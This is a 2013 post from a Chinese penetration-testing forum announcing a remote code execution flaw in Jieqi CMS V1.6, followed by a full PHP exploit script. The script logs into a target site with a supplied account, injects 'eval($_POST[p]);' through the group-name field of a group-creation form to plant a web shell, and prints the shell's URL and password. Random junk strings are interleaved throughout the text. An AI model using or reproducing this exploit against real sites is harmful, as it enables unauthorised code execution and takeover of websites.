中国网络渗透测试联盟
标题:
Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP
[打印本页]
作者:
admin
时间:
2013-2-23 11:28
标题:
Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP
杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
: A6 g1 E: j2 r9 z6 N% [% i% b
. i" ? |( \. y' H, S; i6 a3 o% O/ O& K
) x$ m. ^ K6 S& a
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
! A3 p; T3 v0 ~/ Y1 F% o
需要有一个能创建圈子的用户。
) G C, Y4 b( F& k; N" k+ i! T4 h
+ P, i* k7 U0 U& |4 L2 ]+ ?
<?php
3 x5 j2 Z. {7 q3 ]; v
9 F7 U* p% Y; I. b- d
print_r('
& D/ i7 N& n& v1 P% G9 ~0 W) e- d
+---------------------------------------------------------------------------+
3 C' q+ d/ t$ h4 T2 A
Jieqi CMS V1.6 PHP Code Injection Exploit
+ u- W# w" X+ A
by flyh4t
+ W" K% a& i F) c' m6 D0 E
mail: phpsec at hotmail dot com
' u0 e4 _! Y4 \' j, ], ?- ?
team:
http://www.wolvez.org
% n7 R" a5 L4 v9 \& ~" E8 i
+---------------------------------------------------------------------------+
9 S @5 L1 z* x1 d
'); /**
$ k I' N; ^" ?- W$ C
* works regardless of php.ini settings
; r( \! T8 L5 y- }2 ?$ ?0 X4 {
*/ if ($argc < 5) { print_r('
1 p- z( l" z0 K" W: G% g5 B
+---------------------------------------------------------------------------+
! Y% I. t, f7 T! \: a
Usage: php '.$argv[0].' host path username
0 g% x* [0 I S; p$ p
host: target server (ip/hostname)
) G$ b8 e+ S# Q4 Z9 L! J% ^
path: path to jieqicms
~7 H+ R2 G0 A, R S
uasename: a username who can create group
x9 d3 c) B# Z5 S( @& o& f
Example:
8 r: a1 ]# |- F1 E
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
7 ~9 ]' z* s9 n
+---------------------------------------------------------------------------+
% z9 E! q7 T& a, w3 { v5 G
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
: D) ^) {, ~* U, }* }
Content-Disposition: form-data; name="gname"
9 J' R8 }! h m( k4 V6 @/ T4 r) Y
9 t; \6 X) d" y8 E# E+ j1 i+ m
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
$ X1 ^8 `: T3 } T+ j% o- S9 H
-----------------------------23281168279961
3 U1 H1 q/ |, L3 k: b
Content-Disposition: form-data; name="gcatid"
, _& c4 B6 Q. s5 K
, l1 e, R/ o Q
1
' x+ O: p1 n3 r
-----------------------------23281168279961
/ ?) \/ t ~$ O$ a; s, q
Content-Disposition: form-data; name="gaudit"
/ g" I8 J$ g& b' R! z6 U
' y) j9 r4 \7 |3 I/ Y- ?
1
6 F, M' l6 p' E% p( o% A
-----------------------------23281168279961
! ]' ^' c- _. z$ }. J' u0 h
Content-Disposition: form-data; name="gbrief"
/ v9 W, r% H& @; Y
5 h. S8 d% `" T
1
& _- U) V" G* P& s8 c+ m6 R
-----------------------------23281168279961--
3 ^* P4 u R8 a1 } j% r
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean();
www.2cto.com
3 l: Y* r: l R' ^
8 d4 v/ H2 g) X
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2